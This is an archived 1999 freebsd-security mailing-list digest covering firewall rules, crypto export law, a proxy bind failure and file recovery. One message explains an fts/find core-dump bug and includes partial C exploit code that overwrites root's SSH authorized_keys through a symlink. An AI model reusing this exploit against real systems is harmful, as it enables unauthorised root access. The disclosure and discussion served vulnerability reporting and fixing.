<37C1D419.B844DCE@softweyr.com> Date: Mon, 23 Aug 1999 17:07:05 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Warner Losh Cc: E Kovarski , Alex Nash , freebsd-security@FreeBSD.ORG, advocacy@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <37C19181.9046615A@softweyr.com> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> <37C0DB86.838CF89E@softweyr.com> <87k8qnauj4.fsf@nyctereutes.digitalized.com> <199908231840.MAA40683@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > In message <37C19181.9046615A@softweyr.com> Wes Peters writes: > : Several others have asked for this as well, so here's the first > : mention of it: > : http://www.computerworld.com/home/news.nsf/all/9908102chaos > > Yes, but where's the claymation MPEG of the Linux Death Match :-) Where is Nick Park when you need him? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 17: 3:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 948FD15942 for ; Mon, 23 Aug 1999 17:03:24 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id RAA36810; Mon, 23 Aug 1999 17:03:21 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908240003.RAA36810@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <199908232255.QAA02707@mt.sri.com> from Nate Williams at "Aug 23, 1999 04:55:34 pm" To: nate@mt.sri.com (Nate Williams) Date: Mon, 23 Aug 1999 17:03:21 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > > > ipfw add 40539 allow log udp from any 53 to any > > > > > > > > > > This is also insecure, in that it allows anyone to use source port 53 to > > > > > connect to *any* UDP port in your network. > ... > > > > Yes, my rules before these have large blocks of udp/tcp ports that log > > thier activity, for what you want it would be something like: > > > > ipfw add 100 deny log tcp from any 1-52 to any > > ipfw add 100 deny log tcp from any 54-65535 to any > > ipfw add 200 deny log udp from any 1-52 to any > > ipfw add 200 deny log udp from any 54-65565 to any > > > > And of cource, the reverse rules > > ipfw add 300 deny log tcp from any to any 1-52 > > ipfw add 300 deny log tcp from any to any 54-65535 > > ipfw add 400 deny log udp from any to any 1-52 > > ipfw add 400 deny log udp from any to any 54-65535 > > Except that you're still allowing connections *from* port 53 to any UDP > service in your network, which bothers me. (I'm doing it as well, FWIW, > although I'm limiting it to a single box.) > > *sigh* If you want me to write you a complete set of rules, you'll have to pay for that. I've given you the data you need to create a correct set, your just not looking at it right. > > Outsource your DNS services so that no public queries ever hit your > > master would be another way. This is known as a hidden master DNS > > server, you simply get 2 public secondaries, list them in the SOA > > for the zone, but leave out the real master. No one even knows to > > go look at your box, except if they break into the slaves. > > Ahh, this is an idea. This is essentially what I'm doing now, except I > didn't think to hide the master. :-), lots of folks do this, espcially when the real master is sitting on the long side of anything slower than fractional T1. > > However, we are trying to be more and more 'independant' of the parent > company, so for now I think we'll deal with the paranoia. Also, I don't > trust the people who are my secondaries as much to be secure. > > > Nate > -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 24 0:42:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 2E19014CF3 for ; Tue, 24 Aug 1999 00:42:30 -0700 (PDT) (envelope-from nick@rapidnet.com) Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id BAA08854; Tue, 24 Aug 1999 01:40:01 -0600 (MDT) Date: Tue, 24 Aug 1999 01:40:01 -0600 (MDT) From: Nick Rogness To: sthaug@nethelp.no Cc: nate@mt.sri.com, freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <99482.935441867@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 23 Aug 1999 sthaug@nethelp.no wrote: > > There is no 8.9.2. Maybe you mean 8.2.2? Not released yet, but it's > expected soon. My mistake, 8.2.1 is right. 8.1.2 comes shipped with FBSD 3.1 & 3.2. ******************************************************************* Nick Rogness Shaw's Principle: System Administrator Build a system that even a fool RapidNet, INC can use, and only a fool will nick@rapidnet.com want to use it. ******************************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 24 2:19:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from awfulhak.org (dynamic-123.max1-du-ws.dialnetwork.pavilion.co.uk [212.74.8.123]) by hub.freebsd.org (Postfix) with ESMTP id 29FB6153CD; Tue, 24 Aug 1999 02:19:40 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from keep.lan.Awfulhak.org (root@keep.lan.Awfulhak.org [172.16.0.8]) by awfulhak.org (8.9.3/8.9.3) with ESMTP id JAA04671; Tue, 24 Aug 1999 09:28:15 +0100 (BST) (envelope-from brian@lan.awfulhak.org) Received: from keep.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by keep.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id JAA91459; Tue, 24 Aug 1999 09:31:32 +0100 (BST) (envelope-from brian@keep.lan.Awfulhak.org) Message-Id: <199908240831.JAA91459@keep.lan.Awfulhak.org> X-Mailer: exmh version 2.0.2 2/24/98 To: "Jordan K. Hubbard" Cc: Darren Reed , petrilli@amber.org (Christopher Petrilli), freebsd-security@FreeBSD.org, jdp@FreeBSD.org Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 In-reply-to: Your message of "Sun, 22 Aug 1999 20:42:46 PDT." <4726.935379766@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 24 Aug 1999 09:31:31 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jkh@zippy.cdrom.com said: > Bay Area region. We've already talked to our lawyer, he said it > looked legit to him, and so we've been shipping crypto on our CDs for > over a year now. I even announced it back then, to almost no audience > reaction whatsoever. It seems that people like to get more excited > about the prospect of something being closed than it being opened up. > :) Shouldn't etc/cvsup/ (from the cvsup-mirror port) be updated to reflect this ? I believe a lot of people don't know about the lack of restrictions in SF, and the fact that cvsup-mirror gets the crypto stuff from South Africa doesn't exactly drive the point home :-] -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 24 9:16:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from wall.polstra.com (rtrwan160.accessone.com [206.213.115.74]) by hub.freebsd.org (Postfix) with ESMTP id 5F8FA14D03 for ; Tue, 24 Aug 1999 09:15:44 -0700 (PDT) (envelope-from jdp@polstra.com) Received: from vashon.polstra.com (vashon.polstra.com [206.213.73.13]) by wall.polstra.com (8.9.3/8.9.1) with ESMTP id IAA28822; Tue, 24 Aug 1999 08:29:58 -0700 (PDT) (envelope-from jdp@polstra.com) Received: (from jdp@localhost) by vashon.polstra.com (8.9.3/8.9.1) id IAA77812; Tue, 24 Aug 1999 08:29:58 -0700 (PDT) (envelope-from jdp@polstra.com) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <199908240831.JAA91459@keep.lan.Awfulhak.org> Date: Tue, 24 Aug 1999 08:29:58 -0700 (PDT) Organization: Polstra & Co., Inc. From: John Polstra To: Brian Somers Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 Cc: freebsd-security@FreeBSD.ORG, (Christopher Petrilli) , Darren Reed , "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brian Somers wrote: > jkh@zippy.cdrom.com said: >> Bay Area region. We've already talked to our lawyer, he said it >> looked legit to him, and so we've been shipping crypto on our CDs for >> over a year now. I even announced it back then, to almost no audience >> reaction whatsoever. It seems that people like to get more excited >> about the prospect of something being closed than it being opened up. >> :) > > Shouldn't etc/cvsup/ (from the cvsup-mirror port) be updated to > reflect this ? I believe a lot of people don't know about the lack > of restrictions in SF, and the fact that cvsup-mirror gets the crypto > stuff from South Africa doesn't exactly drive the point home :-] No, I don't think that change should be made. It could put the individual mirror sites at legal risk. It's one thing for Walnut Creek CD-ROM to decide to assume that risk themselves; quite another thing to make it the default that would affect all the mirror sites. If somebody in Europe fetches the crypto stuff from a mirror in, say, Massachusetts, it's being exported from Massachusetts, not from the SF Bay Area where it is supposedly OK. John --- John Polstra jdp@polstra.com John D. Polstra & Co., Inc. Seattle, Washington USA "No matter how cynical I get, I just can't keep up." -- Nora Ephron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 24 15:12:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from yucca.daewoo.lublin.pl (yucca.daewoo.lublin.pl [195.205.71.11]) by hub.freebsd.org (Postfix) with ESMTP id 1046015277 for ; Tue, 24 Aug 1999 15:12:32 -0700 (PDT) (envelope-from raf@tb-303.org) Received: from localhost (raf@localhost) by yucca.daewoo.lublin.pl (GetMail 1.2/sliffka0.3) with SMTP id AAA16146 for ; Wed, 25 Aug 1999 00:20:17 +0200 (CEST) X-Authentication-Warning: yucca.daewoo.lublin.pl: raf owned process doing -bs Date: Wed, 25 Aug 1999 00:20:17 +0200 (CEST) From: Rafal Banaszkiewicz X-Sender: raf@yucca.daewoo.lublin.pl To: freebsd-security@freebsd.org Subject: fts_print() , find and other stuff ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What do you think about that ? http://www.rootshell.com/archive-j457nxiqi3gq59dv/199906/freebsdover.txt One of my friends has written sploit code for this bug ? It's old bug ... and it's still not fixed . /* Rafal Banaszkiewicz | mailto:raf@yucca.daewoo.lublin.pl , #lublin UIN : 35053919 | http://www.no-web.page.pl , [RaF] on IrcNet */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 0:10: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id DE287160F8 for ; Wed, 25 Aug 1999 00:09:44 -0700 (PDT) (envelope-from sdynamic@xtra.co.nz) Received: from sdk6 ([210.55.151.189]) by mta2-rme.xtra.co.nz (InterMail v4.01.01.00 201-229-111) with SMTP id <19990825065946.ZSGM2478302.mta2-rme@sdk6>; Wed, 25 Aug 1999 18:59:46 +1200 Message-ID: <007501beeec6$e3de13f0$061ea8c0@sdk6.sd.co.nz> From: "Michael Williams" To: , Cc: Subject: IPBind patch for fwtk on freeBSD 3.2 Date: Wed, 25 Aug 1999 18:55:59 +1200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw proxies with success on any of the freeBSD OS version's?. I have found it to work exactly as expected under RedHat Linux 6.0 as per the syslog entries at the end of this mail. The documentation clearly states, This patch has been tested and verified on the following systems: Solaris 2.5.1 (sparc) Solaris 2.5 (x86) So I am not expecting to much as it does work on my test RedHat server just not on the freeBSD 3.2 server which happens to be the gateway I want to use this on (: However looking through the source code I can see that under freeBSD it makes it through the create socket call, then the setsockopt call OK but fails on the Bind seeming to not like the address. I am not sure how to figure out if the problem is an access rights issue or perhaps an address:port format issue. A point worth noting is that when configured to bind the port only, then the bind is fine and in fact the proxy works as expected and when run in daemon mode sets up a listener on *.port for all interfaces. I do have an IPFW rulebase loaded on the freeBSD server which does not seem to interfere as the plug-gw behaves fine as bind to port only. Looking through my 4.4BSD books I can see that the bind call is quite happy to bind the address of 0/ and decide on the fly the correct interface and this made me wonder if it wanted to bind to an interface address rather than an IP address?. I am starting the proxy with the following, /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http Here are the syslog entries from both servers. Hope they come through legible. redhat 6 linux 2.2.15-22 kernel. Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip 192.168.30.3(192.168.30.3), port 80 . . Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80 Aug 25 05:10:54 xmailgate last message repeated 3 times Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!! localip = 192.168.30.3 Aug 25 05:10:54 xmailgate plug-gw[1139]: connect host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080 freebsd 3.2 kernel Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip 172.16.30.4 (172.16.30.4), port 81 Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't assign requested address Any helpfull comment would be appreciated. Thanks, Mike. Michael Williams Software Dynamics mailto:sdynamic@xtra.co.nz http://www.voyager.co.nz/~michaelw cell ph: 025 995 914 ph: +64 9 2744876 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 0:16:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 4B89716D03 for ; Wed, 25 Aug 1999 00:14:25 -0700 (PDT) (envelope-from venglin@FreeBSD.lublin.pl) Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:33547 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Wed, 25 Aug 1999 09:13:54 +0200 Received: (qmail 91010 invoked by uid 66); 25 Aug 1999 07:16:24 -0000 Received: (qmail 18360 invoked from network); 25 Aug 1999 07:13:28 -0000 Received: from lagoon.gadaczka.org (HELO lagoon.gadaczka.FreeBSD.lublin.pl) (venglin@192.168.0.2) by mailhost.gadaczka.org with SMTP; 25 Aug 1999 07:13:28 -0000 Message-ID: X-Mailer: XFMail 1.3 [p0] on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT MIME-Version: 1.0 In-Reply-To: X-SMS: +48601383657@text.plusgsm.pl X-PGP: PGP key on WWW or finger X-Operating-System: FreeBSD 3.2-STABLE (i386) Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST) Organization: Lubelska Grupa Uzytkownikow BSD From: Przemyslaw Frasunek To: Rafal Banaszkiewicz Subject: RE: fts_print() , find and other stuff ? Cc: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24-Aug-99 Rafal Banaszkiewicz wrote: > One of my friends has written sploit code for this bug ? It's old > bug ... and it's still not fixed . Yes, this bug is quite easy to exploit. Find(1) runs every day from /etc/security script. It segfaults, when directory tree is _very_ long, because of junk pointer to directory name. Core is created in one of directories from our tree. But if find.core already exists, it's overwritten. It's possible to create symlink from eg. master.passwd or something else to find.core, and this file will be overwritten. Sample code below. BTW. Sorry for my poor English. /* (c) 1999 babcia padlina ltd. bug in fts libc functions allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include #include #include #include #include #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(void) { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i; Wed, 25 Aug 1999 00:55:31 -0700 (PDT) (envelope-from uldisk@kb.lkb.bkc.lv) Received: from relay.lkb.bkc.lv (relay.lkb.lv [192.168.203.194]) by proxy.lkb.lv (8.9.1/8.9.1) with SMTP id KAA06919 for ; Wed, 25 Aug 1999 10:54:38 +0300 (EET DST) Received: from kb.lkb.bkc.lv by relay.lkb.bkc.lv with SMTP id AA11971 (5.65.kiae-1 for ); Wed, 25 Aug 1999 11:02:25 +0300 Received: from KB/SpoolDir by kb.lkb.bkc.lv (Mercury 1.21); 25 Aug 99 10:54:18 -200 Received: from SpoolDir by KB (Mercury 1.21); 25 Aug 99 10:54:15 -200 Received: from kb.lkb.bkc.lv by kb.lkb.bkc.lv (Mercury 1.21) with ESMTP; 25 Aug 99 10:54:11 -200 Message-Id: <37C3A13A.2A94EDFB@kb.lkb.bkc.lv> Date: Wed, 25 Aug 1999 10:54:34 +0300 From: Uldis Kuplis X-Mailer: Mozilla 4.6 [en] (WinNT; I) X-Accept-Language: en Mime-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: undelete Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org User, who was admin, and had wheel group, deleted /bin; /etc; /var directories from my FreeBSD 3.1. Can I undelete these directories? If it possible, then how to do it? regards, Uldis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 1:57:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 79DA215B23 for ; Wed, 25 Aug 1999 01:57:32 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id SAA81927; Wed, 25 Aug 1999 18:57:17 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199908250857.SAA81927@mail.theinternet.com.au> Subject: Re: undelete In-Reply-To: <37C3A13A.2A94EDFB@kb.lkb.bkc.lv> from Uldis Kuplis at "Aug 25, 1999 10:54:34 am" To: uldisk@kb.lkb.bkc.lv (Uldis Kuplis) Date: Wed, 25 Aug 1999 18:57:17 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Uldis Kuplis ]--------------------------------------------- | User, who was admin, and had wheel group, | deleted /bin; /etc; /var directories from my FreeBSD 3.1. | | Can I undelete these directories? | If it possible, then how to do it? Restore from your backup tape. :-) -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 2:39:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from proxy.lkb.lv (proxy.lkb.lv [195.13.170.2]) by hub.freebsd.org (Postfix) with ESMTP id B0071152C3 for ; Wed, 25 Aug 1999 02:39:27 -0700 (PDT) (envelope-from uldisk@kb.lkb.bkc.lv) Received: from relay.lkb.bkc.lv (relay.lkb.lv [192.168.203.194]) by proxy.lkb.lv (8.9.1/8.9.1) with SMTP id MAA07831 for ; Wed, 25 Aug 1999 12:24:00 +0300 (EET DST) Received: from kb.lkb.bkc.lv by relay.lkb.bkc.lv with SMTP id AA13348 (5.65.kiae-1 for ); Wed, 25 Aug 1999 12:31:47 +0300 Received: from KB/SpoolDir by kb.lkb.bkc.lv (Mercury 1.21); 25 Aug 99 12:23:40 -200 Received: from SpoolDir by KB (Mercury 1.21); 25 Aug 99 12:22:55 -200 Received: from kb.lkb.bkc.lv by kb.lkb.bkc.lv (Mercury 1.21) with ESMTP; 25 Aug 99 12:22:48 -200 Message-Id: <37C3B5FE.BF5D0296@kb.lkb.bkc.lv> Date: Wed, 25 Aug 1999 12:23:10 +0300 From: Uldis Kuplis X-Mailer: Mozilla 4.6 [en] (WinNT; I) X-Accept-Language: en Mime-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: undelete References: <199908250857.SAA81927@mail.theinternet.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Andrew Kenneth Milton wrote: > > +----[ Uldis Kuplis ]--------------------------------------------- > | User, who was admin, and had wheel group, > | deleted /bin; /etc; /var directories from my FreeBSD 3.1. > | > | Can I undelete these directories? > | If it possible, then how to do it? > > Restore from your backup tape. :-) Good joke :) Because this system have no tapes. I was admin for this sys only 2 days. Needs to undelete only /var .. Linux has MC. That can undelete files from ext2fs. May be FreeBSD also has MC with this feature? Uldis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 3:15:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 92600152EF for ; Wed, 25 Aug 1999 03:15:18 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id UAA83465; Wed, 25 Aug 1999 20:12:54 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199908251012.UAA83465@mail.theinternet.com.au> Subject: Re: undelete In-Reply-To: <37C3B5FE.BF5D0296@kb.lkb.bkc.lv> from Uldis Kuplis at "Aug 25, 1999 12:23:10 pm" To: uldisk@kb.lkb.bkc.lv (Uldis Kuplis) Date: Wed, 25 Aug 1999 20:12:54 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Uldis Kuplis ]--------------------------------------------- | | | Andrew Kenneth Milton wrote: | > | > +----[ Uldis Kuplis ]--------------------------------------------- | > | User, who was admin, and had wheel group, | > | deleted /bin; /etc; /var directories from my FreeBSD 3.1. | > | | > | Can I undelete these directories? | > | If it possible, then how to do it? | > | > Restore from your backup tape. :-) | | Good joke :) | Because this system have no tapes. | I was admin for this sys only 2 days. | Needs to undelete only /var .. | | Linux has MC. That can undelete files from ext2fs. | May be FreeBSD also has MC with this feature? Midnight Commander is available from the ports tree: /usr/ports/misc/mc I dunno if it can undelete though. You should really have backups though (and better staff as well it seems) even if you have to backup across the network. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 3:25:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 0CBD714EEB for ; Wed, 25 Aug 1999 03:25:16 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with SMTP id MAA25957; Wed, 25 Aug 1999 12:24:02 +0200 (MET DST) Date: Wed, 25 Aug 1999 12:23:42 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: Andrew Kenneth Milton Cc: uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG Subject: Re: undelete In-Reply-To: <199908251012.UAA83465@mail.theinternet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Pretty sure that ufs does _not_ have undelete. The undelete feature in FAT is based on taking the name of the file you want to undelete, replace the first character with 0x2d and try whether the clusters are allocated or not. In Windows it is simply based on moving the file out of the way instead of deleting it, and keeping track of where the file went. In ext2fs I guess it must be something similar. I know of know such mechanism in ufs. Also the words 'undelete' and 'recover' do not appear in the source of ufs, ffs, mfs. So, you might be out of luck. Below the list of directories on that partition that you should have. Nick /var /var/tmp /var/tmp/vi.recover /var/account /var/at /var/at/jobs /var/at/spool /var/backups /var/crash /var/cron /var/cron/tabs /var/db /var/db/pkg /var/log /var/mail /var/msgs /var/preserve /var/run /var/rwho /var/spool /var/spool/lock /var/spool/lpd /var/spool/mqueue /var/spool/output /var/spool/output/lpd /var/spool/uucp /var/spool/uucp/.Preserve /var/spool/uucp/.Sequence /var/spool/uucp/.Status /var/spool/uucp/.Temp /var/spool/uucp/.Xqtdir /var/spool/uucppublic /var/spool/opielocks /var/yp /var/games /var/games/hackdir /var/games/hackdir/save /var/games/larn /var/games/phantasia /var/adm /var/adm/tcheck /var/adm/tcheck/databases > | Good joke :) > | Because this system have no tapes. > | I was admin for this sys only 2 days. > | Needs to undelete only /var .. > | > | Linux has MC. That can undelete files from ext2fs. > | May be FreeBSD also has MC with this feature? > > Midnight Commander is available from the ports tree: > > /usr/ports/misc/mc > > I dunno if it can undelete though. > > You should really have backups though (and better staff as well it seems) > even if you have to backup across the network. > > -- > Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew > The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton > ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 7:27: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from connetsys.com (fw-01.connetsys.com [216.103.216.202]) by hub.freebsd.org (Postfix) with ESMTP id 4778C15A38 for ; Wed, 25 Aug 1999 07:26:42 -0700 (PDT) (envelope-from whamlin@connetsys.com) Received: from fearless.connetsys.com (fw-mgmt-01 [10.0.2.10]) by connetsys.com (8.8.8/8.7.3) with ESMTP id HAA17579; Wed, 25 Aug 1999 07:25:43 -0700 (PDT) Received: from mailhost (mailhost [10.0.1.40]) by fearless.connetsys.com (8.8.8/8.8.8) with SMTP id HAA23497; Wed, 25 Aug 1999 07:25:42 -0700 (PDT) Date: Wed, 25 Aug 1999 07:25:42 -0700 (PDT) From: "William L. Hamlin" X-Sender: whamlin@fearless To: Michael Williams Cc: freebsd-security@freebsd.org, fwtk-users@lists.nai.com Subject: Re: IPBind patch for fwtk on freeBSD 3.2 In-Reply-To: <007501beeec6$e3de13f0$061ea8c0@sdk6.sd.co.nz> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael, Which version of IPBind are you using? If you are using anything older than 1.2, get the newest one - that will probably be your problem. There are known issues with earlier versions attempting to bind specific IP addresses on some systems. My next suggestion would be to verify that the IP address you are specifying (172.16.30.4) is indeed the one that you want to use and that it is correctly configured on the local machine. I know this sounds basic, but most of the problem e-mails I get regarding the patch end up being this very problem. A good sign of a computer nut is 